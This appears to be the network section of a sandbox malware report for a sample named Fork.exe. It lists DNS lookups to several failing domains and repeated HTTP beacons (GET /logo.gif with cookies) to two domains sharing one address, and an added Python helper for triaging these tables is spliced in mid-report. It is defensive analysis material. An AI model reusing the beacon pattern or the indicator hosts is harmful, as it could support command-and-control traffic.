Mar 16, 2025 23:04:53.202061892 CET | 49253 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:53.624422073 CET | 53 | 49253 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:53.676687002 CET | 59815 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:53.687273979 CET | 53 | 59815 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:53.849256039 CET | 55478 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:53.874252081 CET | 53 | 55478 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 16, 2025 23:04:28.427220106 CET | 192.168.2.9 | 1.1.1.1 | 0x3020 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.267972946 CET | 192.168.2.9 | 1.1.1.1 | 0xe16a | Standard query (0) | al-somow.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.662575960 CET | 192.168.2.9 | 1.1.1.1 | 0x99b0 | Standard query (0) | amnisure.com.tr | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.744261980 CET | 192.168.2.9 | 1.1.1.1 | 0x8f47 | Standard query (0) | bhagavatirannade.org | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:30.670660019 CET | 192.168.2.9 | 1.1.1.1 | 0x31cf | Standard query (0) | ankara-cambalkon.net | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.168420076 CET | 192.168.2.9 | 1.1.1.1 | 0x9310 | Standard query (0) | aocuoikhanhlinh.vn | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.346298933 CET | 192.168.2.9 | 1.1.1.1 | 0xb771 | Standard query (0) | yeni.antalyahilal.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.365132093 CET | 192.168.2.9 | 1.1.1.1 | 0xf883 | Standard query (0) | arimaexim.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:34.938630104 CET | 192.168.2.9 | 1.1.1.1 | 0x2334 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:35.376758099 CET | 192.168.2.9 | 1.1.1.1 | 0xec53 | Standard query (0) | al-somow.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:35.747778893 CET | 192.168.2.9 | 1.1.1.1 | 0xe21 | Standard query (0) | amnisure.com.tr | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:36.754764080 CET | 192.168.2.9 | 1.1.1.1 | 0xd116 | Standard query (0) | ankara-cambalkon.net | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:37.166395903 CET | 192.168.2.9 | 1.1.1.1 | 0x7b8a | Standard query (0) | aocuoikhanhlinh.vn | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:37.409833908 CET | 192.168.2.9 | 1.1.1.1 | 0x57bb | Standard query (0) | yeni.antalyahilal.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:40.962907076 CET | 192.168.2.9 | 1.1.1.1 | 0xd5e3 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:41.616554976 CET | 192.168.2.9 | 1.1.1.1 | 0x71f4 | Standard query (0) | al-somow.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:41.840270042 CET | 192.168.2.9 | 1.1.1.1 | 0xa228 | Standard query (0) | amnisure.com.tr | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:42.776067019 CET | 192.168.2.9 | 1.1.1.1 | 0x8c09 | Standard query (0) | ankara-cambalkon.net | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:42.867494106 CET | 192.168.2.9 | 1.1.1.1 | 0x8651 | Standard query (0) | aocuoikhanhlinh.vn | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:42.937671900 CET | 192.168.2.9 | 1.1.1.1 | 0x94db | Standard query (0) | yeni.antalyahilal.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:45.610960007 CET | 192.168.2.9 | 1.1.1.1 | 0x7058 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.300482988 CET | 192.168.2.9 | 1.1.1.1 | 0x463c | Standard query (0) | yeni.antalyahilal.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:48.466330051 CET | 192.168.2.9 | 1.1.1.1 | 0x4d73 | Standard query (0) | al-somow.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:48.984642982 CET | 192.168.2.9 | 1.1.1.1 | 0x7992 | Standard query (0) | amnisure.com.tr | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:49.761337042 CET | 192.168.2.9 | 1.1.1.1 | 0xd766 | Standard query (0) | c.pki.goog | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:50.200553894 CET | 192.168.2.9 | 1.1.1.1 | 0x42ab | Standard query (0) | ankara-cambalkon.net | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:50.576114893 CET | 192.168.2.9 | 1.1.1.1 | 0xd6ac | Standard query (0) | aocuoikhanhlinh.vn | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:53.202061892 CET | 192.168.2.9 | 1.1.1.1 | 0x55a1 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:53.676687002 CET | 192.168.2.9 | 1.1.1.1 | 0x7ebb | Standard query (0) | al-somow.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:53.849256039 CET | 192.168.2.9 | 1.1.1.1 | 0x816f | Standard query (0) | amnisure.com.tr | A (IP address) | IN (0x0001) | false
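The DNS and TCP tables in this report answer the first triage questions only after some bookkeeping: which of the queried names resolved, whether several names share one address, how often the sample retries a name that never resolves, and how many separate connections it then opens to the host that did resolve. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code. It works on a small constructed subset of rows copied from this report's DNS Queries, DNS Answers and TCP Packets tables, with fields joined by " | " in the tables' column order; that column order is an assumption about the report layout, and the CET suffix on timestamps is dropped rather than converted.

```python
"""Triage helpers for sandbox network tables: which names resolved, to what,
how often a dead name is retried, and how many TCP connections followed."""
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample input: a subset of rows from this report's DNS Queries,
# DNS Answers and TCP Packets tables, fields joined with " | " in the
# tables' column order (an assumption about the report layout).
DNS_QUERIES = """
Mar 16, 2025 23:04:28.427220106 CET | 192.168.2.9 | 1.1.1.1 | 0x3020 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.744261980 CET | 192.168.2.9 | 1.1.1.1 | 0x8f47 | Standard query (0) | bhagavatirannade.org | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.365132093 CET | 192.168.2.9 | 1.1.1.1 | 0xf883 | Standard query (0) | arimaexim.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:34.938630104 CET | 192.168.2.9 | 1.1.1.1 | 0x2334 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:40.962907076 CET | 192.168.2.9 | 1.1.1.1 | 0xd5e3 | Standard query (0) | businecessity.com | A (IP address) | IN (0x0001) | false
"""
DNS_ANSWERS = """
Mar 16, 2025 23:04:28.848244905 CET | 1.1.1.1 | 192.168.2.9 | 0x3020 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.938927889 CET | 1.1.1.1 | 192.168.2.9 | 0x8f47 | No error (0) | bhagavatirannade.org |  | 3.229.117.57 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.549717903 CET | 1.1.1.1 | 192.168.2.9 | 0xf883 | No error (0) | arimaexim.com |  | 3.229.117.57 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:34.945987940 CET | 1.1.1.1 | 192.168.2.9 | 0x2334 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:41.391596079 CET | 1.1.1.1 | 192.168.2.9 | 0xd5e3 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
"""
TCP_PACKETS = """
Mar 16, 2025 23:04:37.522607088 CET | 49688 | 80 | 192.168.2.9 | 3.229.117.57
Mar 16, 2025 23:04:37.527482986 CET | 80 | 49688 | 3.229.117.57 | 192.168.2.9
Mar 16, 2025 23:04:39.145323992 CET | 49689 | 80 | 192.168.2.9 | 3.229.117.57
Mar 16, 2025 23:04:39.150074005 CET | 80 | 49689 | 3.229.117.57 | 192.168.2.9
Mar 16, 2025 23:04:39.716414928 CET | 49690 | 80 | 192.168.2.9 | 3.229.117.57
"""


def rows(table: str) -> list[list[str]]:
    """Split a pipe-separated table into lists of stripped fields."""
    return [[f.strip() for f in line.split("|")]
            for line in table.strip().splitlines()]


def parse_ts(text: str) -> datetime:
    """'Mar 16, 2025 23:04:28.427220106 CET' -> naive datetime. The nine
    fractional digits are truncated to the six strptime accepts and the
    zone suffix is dropped, not converted."""
    stamp, _zone = text.rsplit(" ", 1)
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def resolution_summary(answers: str) -> dict[str, dict]:
    """Per queried name: reply-code counts and the set of A records returned."""
    summary = defaultdict(lambda: {"codes": Counter(), "addresses": set()})
    for _ts, _src, _dst, _txid, rcode, name, _cname, addr, *_ in rows(answers):
        summary[name]["codes"][rcode] += 1
        if addr not in ("", "none"):
            summary[name]["addresses"].add(addr)
    return dict(summary)


def never_resolved(summary: dict) -> list[str]:
    """Names whose every answer was an error: dead or sinkholed candidates."""
    return sorted(n for n, s in summary.items() if not s["addresses"])


def shared_addresses(summary: dict) -> dict[str, list[str]]:
    """Addresses that more than one queried name resolved to."""
    by_addr = defaultdict(list)
    for name, s in summary.items():
        for addr in s["addresses"]:
            by_addr[addr].append(name)
    return {a: sorted(n) for a, n in by_addr.items() if len(n) > 1}


def retry_gaps(queries: str, name: str) -> list[float]:
    """Seconds between successive queries for one name (its retry cadence)."""
    stamps = sorted(parse_ts(r[0]) for r in rows(queries) if r[5] == name)
    return [round((b - a).total_seconds(), 1) for a, b in zip(stamps, stamps[1:])]


def client_sessions(tcp: str, server_ip: str, server_port: int = 80) -> int:
    """Distinct client source ports seen sending to server_ip:server_port,
    i.e. how many separate TCP connections the sample opened to it."""
    ports = {int(r[1]) for r in rows(tcp)
             if r[4] == server_ip and int(r[2]) == server_port}
    return len(ports)


if __name__ == "__main__":
    s = resolution_summary(DNS_ANSWERS)
    print("never resolved:", never_resolved(s))
    print("shared A records:", shared_addresses(s))
    for ip in shared_addresses(s):
        print(ip, "connections to :80 ->", client_sessions(TCP_PACKETS, ip))
    print("businecessity.com retry gaps (s):",
          retry_gaps(DNS_QUERIES, "businecessity.com"))
```

Run as a script it reports that businecessity.com never resolved, that bhagavatirannade.org and arimaexim.com both map to 3.229.117.57, that the subset shows three distinct ephemeral ports (49688, 49689, 49690) used against that host on port 80, and the gaps between repeated businecessity.com queries. Counting distinct client ports is a cheap stand-in for connection count when, as here, the capture table carries no HTTP decode; feeding the full tables through the same functions extends each count accordingly.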
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 16, 2025 23:04:28.848244905 CET | 1.1.1.1 | 192.168.2.9 | 0x3020 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.519452095 CET | 1.1.1.1 | 192.168.2.9 | 0xe16a | Name error (3) | al-somow.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.678014994 CET | 1.1.1.1 | 192.168.2.9 | 0x99b0 | Name error (3) | amnisure.com.tr | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:29.938927889 CET | 1.1.1.1 | 192.168.2.9 | 0x8f47 | No error (0) | bhagavatirannade.org | | 3.229.117.57 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.091872931 CET | 1.1.1.1 | 192.168.2.9 | 0x31cf | Server failure (2) | ankara-cambalkon.net | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.184340000 CET | 1.1.1.1 | 192.168.2.9 | 0x9310 | Name error (3) | aocuoikhanhlinh.vn | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.353436947 CET | 1.1.1.1 | 192.168.2.9 | 0xb771 | Name error (3) | yeni.antalyahilal.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:31.549717903 CET | 1.1.1.1 | 192.168.2.9 | 0xf883 | No error (0) | arimaexim.com | | 3.229.117.57 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:34.945987940 CET | 1.1.1.1 | 192.168.2.9 | 0x2334 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:35.386795044 CET | 1.1.1.1 | 192.168.2.9 | 0xec53 | Name error (3) | al-somow.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:35.861602068 CET | 1.1.1.1 | 192.168.2.9 | 0xe21 | Name error (3) | amnisure.com.tr | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:36.968828917 CET | 1.1.1.1 | 192.168.2.9 | 0xd116 | Server failure (2) | ankara-cambalkon.net | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:37.175748110 CET | 1.1.1.1 | 192.168.2.9 | 0x7b8a | Name error (3) | aocuoikhanhlinh.vn | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:37.441509008 CET | 1.1.1.1 | 192.168.2.9 | 0x57bb | Name error (3) | yeni.antalyahilal.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:41.391596079 CET | 1.1.1.1 | 192.168.2.9 | 0xd5e3 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:41.635135889 CET | 1.1.1.1 | 192.168.2.9 | 0x71f4 | Name error (3) | al-somow.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:41.859850883 CET | 1.1.1.1 | 192.168.2.9 | 0xa228 | Name error (3) | amnisure.com.tr | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:42.784107924 CET | 1.1.1.1 | 192.168.2.9 | 0x8c09 | Server failure (2) | ankara-cambalkon.net | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:42.920932055 CET | 1.1.1.1 | 192.168.2.9 | 0x8651 | Name error (3) | aocuoikhanhlinh.vn | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:42.951034069 CET | 1.1.1.1 | 192.168.2.9 | 0x94db | Name error (3) | yeni.antalyahilal.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:45.826522112 CET | 1.1.1.1 | 192.168.2.9 | 0x7058 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.314482927 CET | 1.1.1.1 | 192.168.2.9 | 0x463c | Name error (3) | yeni.antalyahilal.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.18 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.36 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.23 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.34 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:47.335861921 CET | 1.1.1.1 | 192.168.2.9 | 0x6b74 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.20 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:48.476771116 CET | 1.1.1.1 | 192.168.2.9 | 0x4d73 | Name error (3) | al-somow.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:49.001082897 CET | 1.1.1.1 | 192.168.2.9 | 0x7992 | Name error (3) | amnisure.com.tr | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:49.768296003 CET | 1.1.1.1 | 192.168.2.9 | 0xd766 | No error (0) | c.pki.goog | pki-goog.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 16, 2025 23:04:49.768296003 CET | 1.1.1.1 | 192.168.2.9 | 0xd766 | No error (0) | pki-goog.l.google.com | | 142.250.186.163 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:50.416800976 CET | 1.1.1.1 | 192.168.2.9 | 0x42ab | Server failure (2) | ankara-cambalkon.net | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:50.630629063 CET | 1.1.1.1 | 192.168.2.9 | 0xd6ac | Name error (3) | aocuoikhanhlinh.vn | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:53.624422073 CET | 1.1.1.1 | 192.168.2.9 | 0x55a1 | Server failure (2) | businecessity.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:53.687273979 CET | 1.1.1.1 | 192.168.2.9 | 0x7ebb | Name error (3) | al-somow.com | none | none | A (IP address) | IN (0x0001) | false
Mar 16, 2025 23:04:53.874252081 CET | 1.1.1.1 | 192.168.2.9 | 0x816f | Name error (3) | amnisure.com.tr | none | none | A (IP address) | IN (0x0001) | false
• bhagavatirannade.org
• arimaexim.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49683 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:29.982558012 CET | 198 | OUT | GET /logo.gif?6b3a03=28108812 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: bhagavatirannade.org
    Cache-Control: no-cache
Mar 16, 2025 23:04:30.442202091 CET | 420 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:30 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49684 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:31.564620018 CET | 191 | OUT | GET /logo.gif?79b3d2=31903560 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arimaexim.com
    Cache-Control: no-cache
Mar 16, 2025 23:04:32.049948931 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49685 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:32.619930029 CET | 305 | OUT | GET /logo.gif?b2e175=46892500 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: bhagavatirannade.org
    Cache-Control: no-cache
    Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; snkz=8.46.123.189
Mar 16, 2025 23:04:33.069434881 CET | 342 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49686 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:33.792232037 CET | 299 | OUT | GET /logo.gif?cb4dd6=106589872 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arimaexim.com
    Cache-Control: no-cache
    Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; snkz=8.46.123.189
Mar 16, 2025 23:04:34.249465942 CET | 335 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49687 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:36.026817083 CET | 307 | OUT | GET /logo.gif?1113539=107429718 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: bhagavatirannade.org
    Cache-Control: no-cache
    Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; snkz=8.46.123.189
Mar 16, 2025 23:04:36.427499056 CET | 342 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49688 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:37.542903900 CET | 300 | OUT | GET /logo.gif?1308dd2=179633250 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arimaexim.com
    Cache-Control: no-cache
    Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; snkz=8.46.123.189
Mar 16, 2025 23:04:38.004046917 CET | 335 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49689 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:39.207050085 CET | 307 | OUT | GET /logo.gif?175d7eb=196001624 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: bhagavatirannade.org
    Cache-Control: no-cache
    Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; snkz=8.46.123.189
Mar 16, 2025 23:04:39.615609884 CET | 342 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49690 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:39.797686100 CET | 300 | OUT | GET /logo.gif?18828d2=179903934 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arimaexim.com
    Cache-Control: no-cache
    Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; snkz=8.46.123.189
Mar 16, 2025 23:04:40.387845993 CET | 335 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49691 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:42.143299103 CET | 307 | OUT | GET /logo.gif?1e72e91=159639765 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: bhagavatirannade.org
    Cache-Control: no-cache
    Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; snkz=8.46.123.189
Mar 16, 2025 23:04:42.547389030 CET | 342 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49692 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
